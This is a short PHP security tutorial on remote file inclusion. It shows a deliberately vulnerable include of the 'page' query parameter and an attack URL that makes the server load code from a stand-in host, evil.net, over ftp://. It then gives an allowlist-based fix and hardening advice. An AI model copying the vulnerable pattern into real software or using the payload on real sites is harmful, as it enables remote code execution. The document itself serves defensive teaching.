Variable Poisoning :: Chapter 1

Expected URL:
  http://example.org/?page=news.php&id=1234

  <?php
  // Vulnerable: the page name comes straight from the query string and is
  // handed to include() unchecked; file_exists() does not restrict what
  // can be included.
  if (file_exists($_GET['page'])) {
      include $_GET['page'];
  }
  ?>
Attack:
  ./?page=ftp://user:pass@evil.net/arbitrary_code.php

  <?php
  // insert evil code here
  ?>
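A hardened replacement for the include above, added here as an example that is not part of the original page: the request value is used only as a key into a fixed allowlist, so it never becomes part of a path or URL. The `pages/` directory and the allowlist entries are assumptions.

```php
<?php
// Added example: allowlist-based page dispatch replacing the unchecked
// include $_GET['page'] shown above.
// Assumption: site pages live under ./pages/ and are listed here.
const PAGES_DIR = __DIR__ . '/pages';
const ALLOWED_PAGES = [
    'news'    => 'news.php',
    'contact' => 'contact.php',
];

// Map the untrusted request value to an allowlisted file.
// Returns the absolute path to include, or null if the value is not a
// known key. Because the user string is only a lookup key, stream
// wrappers (ftp://, php://, ...) and traversal sequences (../) never
// reach include().
function resolve_page(?string $requested): ?string
{
    if ($requested === null || !array_key_exists($requested, ALLOWED_PAGES)) {
        return null;
    }
    $path = PAGES_DIR . '/' . ALLOWED_PAGES[$requested];
    // Defense in depth: realpath() resolves symlinks and confirms the
    // final file still sits inside PAGES_DIR.
    $real = realpath($path);
    $base = realpath(PAGES_DIR);
    if ($real === false || $base === false
        || strpos($real, $base . DIRECTORY_SEPARATOR) !== 0) {
        return null;
    }
    return $real;
}

// Dispatch. file_exists() on the raw parameter is not a defense: PHP
// stream wrappers that support stat() (ftp:// among them) pass it, which
// is why the payload above gets through the original check.
$page = resolve_page($_GET['page'] ?? null);
if ($page === null) {
    http_response_code(404);
    echo 'Unknown page';
    exit;
}
include $page;
```

Independently of the allowlist, keep allow_url_include=Off in php.ini so include() refuses remote wrappers outright, and log rejected page values: a request carrying a URL scheme or ../ in the page parameter is a reliable detection signal for this attack.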